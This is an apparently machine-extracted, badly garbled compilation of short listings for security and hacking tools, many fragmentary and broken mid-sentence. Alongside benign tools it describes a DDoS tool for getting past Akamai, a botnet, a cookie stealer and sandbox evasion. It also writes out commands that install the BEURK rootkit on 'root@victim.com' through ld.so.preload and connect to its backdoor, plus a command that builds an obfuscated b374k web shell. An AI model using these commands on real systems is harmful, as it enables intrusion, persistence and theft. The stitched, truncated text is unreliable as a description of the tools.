Beruflich Dokumente
Kultur Dokumente
2016 COMPILATION
To run:
if rpm distro
$ sudo yum install libcurl-devel
$ make
$./0d1n
Download0d1n
3VILTWINATTACKER - CREATE ROGUE WI-FI ACCESS
POINT AND SNOOPING ON THE TRAFFIC
Ubuntu
$ sudo apt-get install isc-dhcp-server
Kali linux
$ echo "deb http://ftp.de.debian.org/debian wheezy main "
>> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server
Fedora
$ sudo yum install dhcp
Tools Options:
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Download 3vilTwinAttacker
ACUNETIX CLAMPS DOWN ON COSTLY WEBSITE
SECURITY WITH ONLINE SOLUTION
as a virtual security
websites, including
and any additional
allowing you to fix
points in your IT
PTW attack
Fragmentation attack
DownloadAircrack-ng 1.2 RC 2
AIRCRACK-NG 1.2 RC 3 - WEP AND WPA-PSK KEYS
CRACKING PROGRAM
OSdep:
Add
missing
RADIOTAP_SUPPORT_OVERRIDES check.
DownloadAircrack-ng 1.2 RC 3
ANTICUCKOO - A TOOL TO DETECT AND CRASH
CUCKOO SANDBOX
Detection:
Cuckoo hooks detection (all kind of cuckoo hooks).
Suspicius data in own memory (without APIs, page
per page scanning).
Crash (Execute with arguments) (out of a sandbox
these args dont crash the program):
-c1: Modify the RET N instruction of a hooked API
with a higher value. Next call to API pushing more
args into stack. If the hooked API is called from the
Cuckoo Crash
DownloadAntiCuckoo
APPCRASHVIEW - VIEW APPLICATION CRASHES (.WER
FILES)
/
ProfilesFo
lder
<Folder>
/
ReportsF
older
<Folder>
/
ShowRep
ortQueue
<0 | 1>
/
ShowRep
ortArchive
<0 | 1>
/stext
<Filenam
e>
/stab
<Filenam
e>
/scomma
<Filenam
e>
/stabular
<Filenam
e>
/shtml
<Filenam
e>
/sverhtml
<Filenam
e>
/sxml
<Filenam
e>
/sort
<column>
/nosort
DownloadAppCrashView
APPIE - ANDROID PENTESTING PORTABLE INTEGRATED
ENVIRONMENT
DownloadAppie
APPUSE - ANDROID PENTEST PLATFORM UNIFIED
STANDALONE ENVIRONMENT
Easy toUse
DownloadAppUse
ARDT - AKAMAI REFLECTIVE DDOS TOOL
Attack the origin host behind the Akamai Edge hosts and
bypass the DDoS protection offered by Akamai services.
How it works...
What this tool does is, provided a list of Akamai edge nodes
and a valid cache missing request, produces multiple requests
that hit the origin server via the Akamai edge nodes. As you
can imagine, if you had 50 IP addresses under your control,
sending requests at around 20 per second, with 100,000
Akamai edge node list, and a request which resulting in 10KB
hitting the origin, if my calculations are correct, thats around
976MB/ps hitting the origin server, which is a hell of a lot of
traffic.
Finding Akamai Edge Nodes
This can be edited quite easily to find more, it then saves the
IPS automatically.
Download ARDT
ARES - PYTHON BOTNET AND BACKDOOR
INSTALLATION
SERVER
Download Ares
emulator.git
$ aptitude install python-dev
$ make python_module
$ python setup.py install
Usage
DownloadAsHttp
ATSCAN - SERVER, SITE AND DORK SCANNER
DESCRIPTION:
ATSCAN Version 2
Dork scanner.
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.
LIBRERIES TO INSTALL:
ap-get install libxml-simple-perl
SCREENSHOTS:
Download ATSCAN
AUTOBROWSER - CREATE REPORT AND SCREENSHOTS
OF HTTP/S BASED PORTS ON THE NETWORK
AutoBrowser is a tool written in python for penetration testers.
The purpose of this tool is to create report and screenshots of
http/s based ports on the network. It analyze Nmap Report or
scan with Nmap, Check the results with http/s request on each
host using headless web browser, Grab a screenshot of the
response page content.
This tool is designed for IT professionals to perform
penetration testing to scan and analyze NMAP results.
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Examples
Scan with Nmap and Checks the results and create folder
by name project_name: python AutoBrowser.py scan
"192.168.1.1/24" -a="-sT -sV -T3" -p project_name
Get the argument details of analyze method: python
AutoBrowser.py analyze --help
Requirements:
Linux Installation:
1. sudo apt-get install python-pip python2.7-dev libxext-dev
python-qt4 qt4-dev-tools build-essential nmap
2. sudo pip install -r requirements.txt
MacOSx Installation:
1. Install Xcode Command Line Tools (AppStore)
2. ruby -e "$(curl -fsSL https://raw.github.com/
mxcl/homebrew/go)"
Windows Installation:
1. Install setuptools
2. Install pip
3. Install PyQt4
4. install Nmap
5. Open Command Prompt(cmd) as Administrator -> Goto
python folder -> Scripts (cd c:\Python27\Scripts)
6. pip install -r (Full Path To requirements.txt)
Download AutoBrowser
AUTOREAVER - MUTLIPLE ACCESS POINT TARGETS
ATTACK USING REAVER
AutoReaveris bash script which provides multiple access point
attack using reaver and BSSIDs list from a text file.
If processed AP reaches rate limit, script goes to another from
the list, and so forth.
HOW IT WORKS ?
For example:
AA:BB:CC:DD:EE:FF 1 MyWlan
00:BB:CC:DD:EE:FF 13 TpLink
00:22:33:DD:EE:FF 13 MyHomeSSID
REQUIREMENTS
USAGE EXAMPLE
Go to auto-reaver directory
cd ./auto-reaver
Make sure that scripts have x permissions for your user, if not
run
chmod 700 ./washAutoReaver
chmod 700 ./autoReaver
Wait for 1-2 minutes for wash to collect APs, and hit CTRL+C
ADDITIONAL FEATURES
AA:BB:CC:DD:EE:FF R MyWlan
DownloadAutoReaver
AUTORIZE - AUTOMATIC AUTHORIZATION
ENFORCEMENT DETECTION (EXTENSION FOR BURP
SUITE)
Installation
DownloadAutorize
AVCAESAR - MALWARE ANALYSIS ENGINE AND
REPOSITORY
Functionalities
Requirements :
Installation :
save as
-p password
protect
filename
with password
-t theme
use
theme to
-m modules
modules
strip
encode
with base64
-z [no|gzdeflate|gzencode|gzcompress]
compression (use only with -b)
-c [0-9]
level of
compression
-l
list
available modules
-k
list
available themes
example :
$ php -f index.php -- -o myShell.php -p myPassword -s -b
-z gzcompress -c 9
Download B374K
BABUN - A WINDOWS SHELL YOU WILL LOVE!
Plugin-oriented architecture
Integrated oh-my-zsh
Features in 3 minutes
Cygwin
The core of Babun consists of a pre-configured Cygwin. Cygwin
is a great tool, but theres a lot of quirks and tricks that makes
you lose a lot of time to make it actually usable. Not only does
babun solve most of these problems, but also contains a lot of
vital packages, so that you can be productive from the very first
minute.
Package manager
Babun provides a package manager called pact. It is similar to
apt-get or yum. Pact enables installing/searching/upgrading
and deinstalling cygwin packages with no hassle at all. Just
invoke pact --help to check how to use it.
Shell
Babuns shell is tweaked in order to provide the best possible
user-experience. There are two shell types that are preconfigured and available right away - bash and zsh (zsh is the
default one). Babuns shell features:
syntax highlighting
UNIX tools
git-aware prompt
Console
Mintty is the console used in babun. It features an xterm-256
mode, nice fonts and simply looks great!
Proxying
Babun supports HTTP proxying out of the box. Just add the
address and the credentials of your HTTP proxy server to
the .babunrc file located in your home folder and execute
source .babunrc to enable HTTP proxying. SOCKS proxies
are not supported for now.
Developer tools
Babun provides many packages, convenience tools and scripts
that make your life much easier. The long list of features
includes:
programming languages (Python, Perl, etc.)
oh-my-zsh
Plugin architecture
Babun has a very small microkernel (cygwin, a couple of bash
scripts and a bit of a convention) and a plugin architecture on
the top of it. It means that almost everything is a plugin in the
babuns world! Not only does it structure babun in a clean way,
but also enables others to contribute small chunks of code.
Currently, babun comprises the following plugins:
cacert
core
git
oh-my-zsh
pact
cygdrive
dist
shell
Auto-update
Self-update is at the very heart of babun! Many Cygwin tools
are simple bash scripts - once you install them there is no
chance of getting the newer version in a smooth way. You
either delete the older version or overwrite it with the newest
one losing all the changes you have made in between.
Babun contains an auto-update feature which enables updating
both the microkernel, the plugins and even the underlying
cygwin. Files located in your home folder will never be deleted
nor overwritten which preserves your local config and
customizations.
Installer
Babun features an silent command-line installation script that
may be executed without admin rights on any Windows hosts.
Using babun
Setting up proxy
To setup proxy uncomment following lines in the .babunrc file
(%USER_HOME%\.babun\cygwin\home\USER\.babunrc)
# Uncomment this lines to set up your proxy
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost
Setting up git
--2014-03-30 19:34:38--
http://mirrors.kernel.org/
sourceware/cygwin//x86/release/arj/arj-3.10.22-1.tar.bz2
Resolving mirrors.kernel.org (mirrors.kernel.org)...
149.20.20.135, 149.20.4.71,
2001:4f8:1:10:0:1994:3:14, ...
Connecting to mirrors.kernel.org (mirrors.kernel.org)|
149.20.20.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 189944 (185K) [application/x-bzip2]
Saving to: `arj-3.10.22-1.tar.bz2'
100%[=======================================>] 189,944
193K/s
in 1.0s
pact --help
patterns
"pact describe <patterns>" to describe packages
matching patterns
"pact packageof <commands or files>" to locate parent
packages
"pact invalidate" to invalidate pact caches (setup.ini,
etc.)
Options:
--mirror, -m <url> : set mirror
--invalidate, -i
(setup.ini, etc.)
--force, -f : force the execution
--help
--version
The output contains two lines: the previous default shell and the
new default shell
Checking the configuration
babun check
~
Executing babun check
Prompt speed
[OK]
Connection check
[OK]
Update check
[OK]
Cygwin check
[OK]
babun check
~
Executing babun check
Prompt speed
[OK]
Connection check
[OK]
Update check
[OK]
Cygwin check
[OUTDATED]
It will check if there are problems with the speed of the git
prompt, if theres access to the Internet or finally if you are
running the newest version of babun.
The command will output hints if problems occur:
{ ~ } babun check
~
Executing babun check
Prompt speed
[SLOW]
[OK]
Update check
[OK]
Cygwin check
[OK]
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost
Updating babun
To update babun to the newest version execute:
babun update
Startup screen
Shell prompt
Babun update
DownloadBabun
BACKBOX LINUX 4.2 - UBUNTU-BASED LINUX
System requirements
Upgrade instructions
System requirements
Upgrade instructions
DownloadBacula
BEESWARM - ACTIVE IDS MADE EASY
Download Beeswarm
DownloadBetterCap
BEURK - EXPERIMENTAL UNIX ROOTKIT
BEURK is an userland preload rootkit for GNU/Linux, heavily
focused around anti-debugging and anti-detection.
NOTE:BEURKis a recursive acronym
forBEURKExperimentalUnixRootKit
Features
Upcoming features
Usage
Compile
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
Install
scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/
ld.so.preload'
Enjoy !
./client.py victim_ip:port # connect with furtive
backdoor
Dependencies
Download Beurk
BLACKARCH LINUX V2015.07.31 - PENETRATION
TESTING DISTRIBUTION
GetProcAdress, etc.)
Security cookie initialization
C++/CLI images are supported
Image unloading
Increase reference counter for import libraries in case
of manual import mapping
Cyclic dependencies are handled properly
Driver features
Allocate/free/protect user memory
Read/write user and kernel memory
Disable permanent DEP for WOW64 processes
Change process protection flag
Change handle access rights
Remap process memory
Hiding allocated user-mode memory
User-mode dll injection and manual mapping
Manual mapping of drivers
DownloadBlackbone
BLUEMAHO - BLUETOOTH SECURITY TESTING SUITE
Tools:
atshell.c by Bastian Ballmann (modified attest.c by Marcel
Holtmann)
bccmd by Marcel Holtmann
bdaddr.c by Marcel Holtmann
bluetracker.py by smiley
carwhisperer v0.2 by Martin Herfurt
psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin
R. Mulliner
BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
btftp v0.1 by Marcel Holtmann
btobex v0.1 by Marcel Holtmann
greenplaque v1.5 by digitalmunition.com
L2CAP packetgenerator by Bastian Ballmann
obex stress tests 0.1
redfang v2.50 by Ollie Whitehouse
ussp-push v0.10 by Davide Libenzi
exploits/attacks:
Bluebugger v0.1 by Martin J. Muench
bluePIMp by Kevin Finisterre
BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
helomoto by Adam Laurie
hidattack v0.1 by Collin R. Mulliner
Mode 3 abuse attack
Nokia N70 l2cap packet DoS PoC Pierre Betouin
opush abuse (prompts flood) DoS attack
Sony-Ericsson reset display PoC by Pierre Betouin
you can add your own tools by editing 'exploits/exploits.lst'
and 'tools/tools.lst'
Requirements
Download BlueMaho
BLUESCREENVIEW - BLUE SCREEN OF DEATH (STOP
ERROR) INFORMATION IN DUMP FILES
Using BlueScreenView
/
LoadFrom
<Source>
/
MiniDump
Folder
<Folder>
/
SingleDu
mpFile
<Filename
>
/
Computer
sFile
<Filename
>
/
LowerPan
eMode <1
- 3>
/stext
<Filename
>
/stab
<Filename
>
/scomma
<Filename
>
/stabular
<Filename
>
/shtml
<Filename
>
/sverhtml
<Filename
>
/sxml
<Filename
>
/sort
<column>
/nosort
Download BlueScreenView
BLUTO - DNS RECON, DNS ZONE TRANSFER, AND EMAIL
ENUMERATION
Email Enumeration
The target domain is queried for MX and NS records. Subdomains are passively gathered via NetCraft. The target
domain NS records are each queried for potential Zone
Transfers. If none of them gives up their spinach, Bluto will
brute force subdomains using parallel sub processing on the
top 20000 of the 'The Alexa Top 1 Million subdomains'.
NetCraft results are presented individually and are then
compared to the brute force results, any duplications are
(1) Mac and Kali users can simply use the following command
to download and install pip.
curl https://bootstrap.pypa.io/get-pip.py -o - | python
(2) You should now be able to execute 'bluto' from any working
directory in any terminal.
bluto
Upgrade Instructions
--upgrade
Download Bluto
BOHATEI - FLEXIBLE AND ELASTIC DDOS DEFENSE
The frontend folder contains the required files for the web
interface.
For the experiments performed, we used a set of VM images
that contain implementations of the strategy graphs for each
type of attack (SYN Flood, UDP Flood, DNS Amplification and
Elephant Flow). Those images will become available at a later
stage. The tools that were used for those strategy graphs are
the following:
Bro
Snort
Balancer
Iptables
Iperf
Custom scripts to simulate the attacks
Bohatei Paper
Bohatei Slides
Video
DownloadBohatei
BRUTEX - AUTOMATICALLY BRUTE FORCE ALL
SERVICES RUNNING ON A TARGET
DEPENDENCIES
NMap
Hydra
Wfuzz
SNMPWalk
DNSDict
Download BruteX
BTPROXY - MAN IN THE MIDDLE ANALYSIS TOOL FOR
BLUETOOTH
Tested Devices
Pebble Steel smart watch
Moto 360 smart watch
OBDLink OBD-II Bluetooth Dongle
Withings Smart Baby Monitor
If you have tried anything else, please let me know at conorpp
(at) vt (dot) edu.
Dependencies
Need at least 1 Bluetooth card (either USB or internal).
Installation
sudo python setup.py install
Running
To run a simple MiTM or proxy on two devices, run
btproxy <master-bt-mac-address> <slave-bt-mac-address>
Where the master is typically the phone and the slave mac
address is typically the other peripherial device (smart watch,
headphones, keyboard, obd2 dongle, etc).
The master is the device the sends the connection request and
the slave is the device listening for something to connect to it.
After the proxy connects to the slave device and the master
connects to the proxy device, you will be able to see traffic and
modify it.
How to find the BT MAC Address?
Well, you can look it up in the settings usually for a phone. The
most robost way is to put the device in advertising mode and
scan for it.
There are two ways to scan for devices: scanning and inquiring.
hcitool can be used to do this:
hcitool scan
hcitool inq
Usage
Some devices may restrict connecting based on the name,
class, or address of another bluetooth device.
So the program will lookup those three properties of the target
devices to be proxied, and then clone them onto the proxying
adapter(s).
Then it will first try connecting to the slave device from the
cloned master adaptor. It will make a socket for each service
hosted by the slave and relay traffic for each one
independently.
After the slave is connected, the cloned slave adaptor will be
set to be listening for a connection from the master. At this
point, the real master device should connect to the adaptor.
After the master connects, the proxied connection is complete.
Using only one adapter
This program uses either 1 or 2 Bluetooth adapters. If you use
one adapter, then only the slave device will be cloned. Both
devices will be cloned if 2 adapters are used; this might be
necessary for more restrictive Bluetooth devices.
Advanced Usage
Manipulation of the traffic can be handled via python by passing
an inline script. Just implement the master_cb and slave_cb
callback functions. This are called upon receiving data and the
returned data is sent back out to the corresponding device.
# replace.py
def master_cb(req):
"""
Received something from master, about to be sent
to slave.
"""
print '<< ', repr(req)
open('mastermessages.log', 'a+b').write(req)
return req
def slave_cb(res):
"""
Same as above but it's from slave about to be
sent to master
"""
print '>> ', repr(res)
open('slavemessages.log', 'a+b').write(res)
return res
Download Btproxy
BURP SUITE PROFESSIONAL 1.6.26 - THE LEADING
TOOLKIT FOR WEB APPLICATION SECURITY TESTING
v1.6.15
This release introduces a brand new feature: Burp
Collaborator.
Burp Collaborator is an external service that Burp can use to
help discover many kinds of vulnerabilities, and has the
potential to revolutionize web security testing. In the coming
months, we will be adding many exciting new capabilities to
functionality.
An advanced web application Scanner, for automating the
detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized
attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual
requests.
A Sequencer tool, for testing the randomness of session
tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own
plugins, to perform complex and highly customized tasks
within Burp.
v1.6.23
This release adds a new scan check for external service
interaction and out-of-band resource load via injected XML
doctype tags containing entity parameters. Burp now sends
payloads like:
<?xml version='1.0' standalone='no'?><!DOCTYPE
foo [<!ENTITY % f5a30 SYSTEM "http://
u1w9aaozql7z31394loost.burpcollaborator.net">
%f5a30; ]>
and reports an appropriate issue based on any observed
interactions (DNS or HTTP) that reach the Burp Collaborator
server.
the contents of their pages dynamically. It also provides a bidirectional JavaScript bridge API which allows users to create
quick one-off BurpSuite plugin prototypes which can interact
directly with the DOM and Burp's extender API.
System Requirements
Download Burpkit
BWA - OWASP BROKEN WEB APPLICATIONS PROJECT
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Usage
Steps include:
1. Add extension to burp
2. Create a session handling rule in Burp that invokes this
extension
3. Modify the scope to include applicable tools and URLs
4. Configure the bypass options on the "Bypass WAF" tab
5. Test away
Read morehere.
Features
2.
3.
4.
5.
6.
7.
DownloadBypassWAF
CAPTIPPER - MALICIOUS HTTP TRAFFIC EXPLORER
TOOL
Download CapTipper
CENOCIPHER - EASY-TO-USE, END-TO-END ENCRYPTED
COMMUNICATIONS TOOL
FEATURES AT A GLANCE
TECHNICAL DETAILS
DownloadCenoCipher
CHEAT - CREATE AND VIEW INTERACTIVE
CHEATSHEETS ON THE COMMAND-LINE
Using pip
sudo pip install cheat
Using homebrew
brew install cheat
Manually
First install the required python dependencies with:
sudo pip install docopt pygments
Modifying Cheatsheets
Download Cheat
CHROME AUTOFILL VIEWER - TOOL TO VIEW OR DELETE
AUTOCOMPLETE DATA FROM GOOGLE CHROME
BROWSER
How to Use?
interface.
Here are the brief usage details
Launch ChromeAutofillViewer on your system
By default it will automatically find and display the autofill
file from default profile location of Chrome. You can also
select the desired file manually.
Next click on 'Show All' button and all stored Autofill data
will be displayed in the list as shown in screenshot 1
below.
If you want to remove all the entries, click on 'Delete All'
button below.
Finally you can save all displayed entries to HTML/XML/
TEXT/CSV file by clicking on 'Export' button and then
select the type of file from the drop down box of 'Save File
Dialog'.
Starting from version 1.05, you can also read the passwords
stored by Chrome Web browser from an external profile in your
current operating system or from another external drive (For
example: from a dead system that cannot boot anymore). In
order to use this feature, you must know the last logged-on
password used for this profile, because the passwords are
encrypted with the SHA hash of the log-on password, and
without that hash, the passwords cannot be decrypted.
You can use this feature from the UI, by selecting the
'Advanced Options' in the File menu, or from command-line, by
using /external parameter. The user profile path should be
something like "C:\Documents and Settings\admin" in Windows
XP/2003 or "C:\users\myuser" in Windows Vista/2008.
Command-Line Options
/stext <Filename>
/stab <Filename>
/scomma <Filename>
/stabular <Filename>
/shtml <Filename>
/sverhtml <Filename>
/sxml <Filename>
/skeepass <Filename>
DownloadChromePass
CMSMAP - SCANNER TO DETECT SECURITY FLAWS OF
THE MOST POPULAR CMSS (WORDPRESS, JOOMLA AND
DRUPAL)
Usage
abc.test.com:8080/')
-v, --verbose
-T, --threads
-u, --usr
username or file
-p, --psw
password or file
-i, --input
-k, --crack
-w, --wordlist
-U, --update
(J)oomla or (D)rupal
-F, --fullscan
cmsmap.py -k hashes.txt
Download CMSmap
CODETAINER - A DOCKER CONTAINER IN YOUR
BROWSER
godep
make
Configuring codetainer
certs"
# DockerCertPath = "/path/to/certs"
# Database path (optional, default is ~/.codetainer/
codetainer.db)
# DatabasePath = "/path/to/codetainer.db"
3000
3. <html>
4. <head>
5.
<meta charset="UTF-8">
6.
<title>lsof tutorial</title>
7.
8.
<script src="http://code.jquery.com/
jquery-1.10.1.min.js"></script>
9.
<script src="/javascripts/codetainer.js"></script>
10.
<script src="/javascripts/lsof.js"></script>
11. </head>
12. <body>
13.
14. </body>
15. </html>
16. Run the javascript to load the codetainer iframe from the
codetainer API server (supply data-container as the id
of codetainer on the div, or supplycodetainer in the
constructor options).
$('#terminal').codetainer({
terminalOnly: false,
// set to true
// replace with
height: "100%",
});
Download Codetainer
COLLECTION OF AWESOME HONEYPOTS
HONEYPOTS
Database Honeypots
Elastic honey - A Simple Elasticsearch Honeypot
mysql - A mysql honeypot, still very very early stage
A framework for nosql databases ( only redis for now)
- The NoSQL Honeypot Framework
ESPot - ElasticSearch Honeypot
Web honeypots
Glastopf - Web Application Honeypot
phpmyadmin_honeypot - - A simple and effective
phpMyAdmin honeypot
servlet - Web application Honeypot
Nodepot - A nodejs web application honeypot
basic-auth-pot bap - http Basic Authentication
honeyPot
Shadow Daemon - A modular Web Application
Firewall / High-Interaction Honeypot for PHP, Perl &
Python apps
Servletpot - Web application Honeypot
Google Hack Honeypot - designed to provide
reconnaissance against attackers that use search
engines as a hacking tool against your resources.
smart-honeypot - PHP Script demonstrating a smart
honey pot
HonnyPotter - A WordPress login honeypot for
collection and analysis of failed login attempts.
wp-smart-honeypot - WordPress plugin to reduce
comment spam with a smarter honeypot
wordpot - A WordPress Honeypot
Bukkit Honeypot Honeypot - A honeypot plugin for
Bukkit
Laravel Application Honeypot - Honeypot - Simple
spam prevention package for Laravel applications
stack-honeypot - Inserts a trap for spam bots into
responses
EoHoneypotBundle - Honeypot type for Symfony2
forms
shockpot - WebApp Honeypot for detecting Shell
Shock exploit attempts
Service Honeypots
Kippo - Medium interaction SSH honeypot
honeyntp - NTP logger/honeypot
honeypot-camera - observation camera honeypot
troje - a honeypot built around lxc containers. It will
run each connection with the service within a
seperate lxc container.
slipm-honeypot - A simple low-interaction port
monitoring honeypot
HoneyPy - A low interaction honeypot
Ensnare - Easy to deploy Ruby honeypot
RDPy - A Microsoft Remote Desktop Protocol (RDP)
honeypot in python
Anti-honeypot stuff
kippo_detect - This is not a honeypot, but it detects
kippo. (This guy has lots of more interesting stuff)
ICS/SCADA honeypots
Conpot - ICS/SCADA honeypot
scada-honeynet - mimics many of the services from a
popular PLC and better helps SCADA researchers
understand potential risks of exposed control system
devices
SCADA honeynet - Building Honeypots for Industrial
Networks
Deployment
Dionaea and EC2 in 20 Minutes - a tutorial on setting
up Dionaea on an EC2 instance
honeypotpi - Script for turning a Raspberry Pi into a
Honey Pot Pi
Data Analysis
Kippo-Graph - a full featured script to visualize
honeypot database
Sebek in QEMU
Qebek - QEMU based Sebek. As Sebek, it is data
capture tool for high interaction honeypot
Malware Simulator
imalse - Integrated MALware Simulator and Emulator
Distributed sensor deployment
Smarthoneypot - custom honeypot intelligence
system that is simple to deploy and easy to manage
Modern Honey Network - Multi-snort and honeypot
sensor management, uses a network of VMs, small
footprint SNORT installations, stealthy dionaeas, and
a centralized server for management
ADHD - Active Defense Harbinger Distribution
(ADHD) is a Linux distro based on Ubuntu LTS. It
comes with many tools aimed at active defense
preinstalled and configured
Network Analysis Tool
Tracexploit - replay network packets
Log anonymizer
LogAnon - log anonymization library that helps
having anonymous logs consistent between logs and
network captures
server
Honeysink - open source network sinkhole that
provides a mechanism for detection and prevention
of malicious traffic on a given network
Botnet traffic detection
dnsMole - analyse dns traffic, and to potentionaly
detect botnet C&C server and infected hosts
Low interaction honeypot (router back door)
Honeypot-32764 - Honeypot for router backdoor
(TCP 32764)
honeynet farm traffic redirector
Honeymole - eploy multiple sensors that redirect
traffic to a centralized collection of honeypots
HTTPS Proxy
mitmproxy - allows traffic flows to be intercepted,
inspected, modified and replayed
spamtrap
SendMeSpamIDS.py Simple SMTP fetch all IDS and
analyzer
System instrumentation
Sysdig - open source, system-level exploration:
capture system state and activity from a running
Linux instance, then save, filter and analyze
Honeypot for USB-spreading malware
Ghost-usb - honeypot for malware that propagates
via USB storage devices
Data Collection
Kippo2MySQL - extracts some very basic stats from
Kippos text-based log files (a mess to analyze!) and
inserts them in a MySQL database
Kippo2ElasticSearch - Python script to transfer data
from a Kippo SSH honeypot MySQL database to an
ElasticSearch instance (server or cluster)
Passive network audit framework parser
pnaf - Passive Network Audit Framework
VM Introspection
VIX virtual machine introspection toolkit - VMI toolkit
for Xen, called Virtual Introspection for Xen (VIX)
vmscope - Monitoring of VM-based High-Interaction
Honeypots
vmitools - C library with Python bindings that makes it
easy to monitor the low-level details of a running
virtual machine
Binary debugger
Hexgolems - Schem Debugger Frontend - A
debugger frontend
Hexgolems - Pint Debugger Backend - A debugger
backend and LUA wrapper for PIN
Mobile Analysis Tool
SurfIDS
Automated malware analysis system
Cuckoo
Anubis
Hybrid Analysis
Low interaction
mwcollectd
Low interaction honeypot on USB stick
Honeystick
Honeypot extensions to Wireshark
Whireshark Extensions
Data Analysis Tool
HpfeedsHoneyGraph
Acapulco
Telephony honeypot
Zapping Rachel
Client
Pwnypot
MonkeySpider
Capture-HPC-NG
Wepawet
URLQuery
Trigona
Thug
Shelia
PhoneyC
Jsunpack-n
HoneyC
HoneyBOT
CWSandbox / GFI Sandbox
Capture-HPC-Linux
Capture-HPC
Andrubis
Visual analysis for network traffic
ovizart
Binary Management and Analysis Framework
Viper
Honeypot
Single-honeypot
Honeyd For Windows
IMHoneypot
Deception Toolkit
PDF document inspector
peepdf
Distribution system
Thug Distributed Task Queuing
HoneyClient Management
HoneyWeb
Network Analysis
HoneyProxy
Hybrid low/high interaction honeypot
HoneyBrid
Sebek on Xen
xebek
SSH Honeypot
Kojoney
Cowrie
Glastopf data analysis
Glastopf Analytics
Distributed sensor project
DShield Web Honeypot Project
Distributed Web Honeypot Project
a pcap analyzer
Honeysnap
Client Web crawler
HoneySpider Network
network traffic redirector
Honeywall
Honeypot Distribution with mixed content
HoneyDrive
Honeypot sensor
Dragon Research Group Distro
Network analysis
Quechua
Sebek data visualization
Sebek Dataviz
SIP Server
Artemnesia VoIP
Botnet C2 monitoring
botsnoopd
low interaction
mysqlpot
Malware collection
Honeybow
HONEYD TOOLS
Honeyd plugin
Honeycomb
Honeyd viewer
Honeyview
Honeyd to MySQL connector
Honeyd2MySQL
A script to visualize statistics from honeyd
Honeyd-Viz
Honeyd UI
Honeyd configuration GUI - application used to
configure the honeyd daemon and generate
configuration files
Honeyd stats
Honeydsum.pl
Sandbox
RFISandbox - a PHP 5.x script sandbox built on top
of funcall
dorothy2 - A malware/botnet analysis framework
written in Ruby
COMODO automated sandbox
Argos - An emulator for capturing zero-day attacks
Sandbox-as-a-Service
malwr.com - free malware analysis service and
community
detux.org - Multiplatform Linux Sandbox
Joebox Cloud - analyzes the behavior of malicious
files including PEs, PDFs, DOCs, PPTs, XLSs,
APKs, URLs and MachOs on Windows, Android and
Mac OS X for suspicious activities
DATA TOOLS
Front Ends
Tango - Honeypot Intelligence with Splunk
Django-kippo - Django App for kippo SSH Honeypot
Wordpot-Frontend - a full featured script to visualize
statistics from a Wordpot honeypot -ShockpotFrontend - a full featured script to visualize statistics
from a Shockpot honeypot
Visualization
Source
COMMIX - AUTOMATED ALL-IN-ONE OS COMMAND
Usage
--install
--version
--update
and exit.
Target
This options has to be provided, to define the target URL.
--url=URL
Target URL.
--url-reload
execution.
Request
These options can be used, to specify how to connect to the
target
URL.
--host=HOST
--referer=REFERER
--user-agent=AGENT
--cookie=COOKIE
--headers=HEADERS
'Header1:Value1\nHeader2:Value2').
--proxy=PROXY
'127.0.0.1:8080').
--auth-url=AUTH_..
--auth-data=AUTH..
--auth-cred=AUTH..
(e.g.
'admin:admin').
Injection
These options can be used, to specify which parameters to
inject and
to provide custom injection payloads.
--data=DATA
'INJECT_HERE' tag).
--suffix=SUFFIX
--prefix=PREFIX
--technique=TECH
technique : 'classic',
'eval-based', 'time-based' or 'filebased'.
--maxlen=MAXLEN
based technique
(Default: 10000 chars).
--delay=DELAY
file-based
techniques (Default: 1 sec).
--base64
files directory.
--icmp-exfil=IP_..
(e.g.
'ip_src=192.168.178.1,ip_dst=192.168.178.3').
Usage Examples
DownloadCommix
COOKIES MANAGER - SIMPLE COOKIE STEALER
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
DownloadCookies Manager
COOKIESCANNER - TOOL TO CHECK THE COOKIE FLAG
FOR A MULTIPLE SITES
FEATURES:
Multiple options for output (and export using >). xml, json,
csv, grepable
Check the flags in multiple sites by a file input (one per
line). This is very useful for pentesters when they want
check the flags in multiple sites.
Google search. Search in google all subdomains and
check the cookies for each domain.
Colors for the normal output.
USAGE
Usage: cookiescanner.py [options]
Example: ./cookiescanner.py -i ips.txt
Options:
-h, --help
-i INPUT, --input=INPUT
File input with the list of
webservers
-I, --info
More info
-u URL, --url=URL
URL
-f FORMAT, --format=FORMAT
Output format (json, xml, csv,
normal, grepable)
--nocolor
format output)
-g GOOGLE, --google=GOOGLE
Search in google by domain
REQUIREMENTS
requests >= 2.8.1
BeautifulSoup >= 4.2.1
INSTALL REQUIREMENTS
pip3 install --upgrade -r requirements.txt
DownloadCookiescanner
COWRIE - SSH HONEYPOT
Software required:
An operating system (tested on Debian, CentOS,
FreeBSD and Windows 7)
Python 2.5+
Twisted 8.0+
PyCrypto
pyasn1
Zope Interface
Files of interest:
DownloadCowrie
CRACKMAPEXEC - A SWISS ARMY KNIFE FOR
PENTESTING WINDOWS/ACTIVE DIRECTORY
ENVIRONMENTS
___.
_______
______
||
\/
,----'|
,----'
|_)
/
|
|
|
/
/
/_\
_______ ___
||
____|\
___
|/
\ /
/ |
,----'|
'
| |
|__
|__
|_)
/
/ |
/_\
___/
__|
|
>
<
<
|
|
`----.|
|\
_____
____ |
__
|\/|
______
.______
____| /
__|
___
___
`----.
\----. /
\
_____
|
\
|
`----.|
|____
\______|| _| `._____|/__/
__|
|__| /__/
\__\
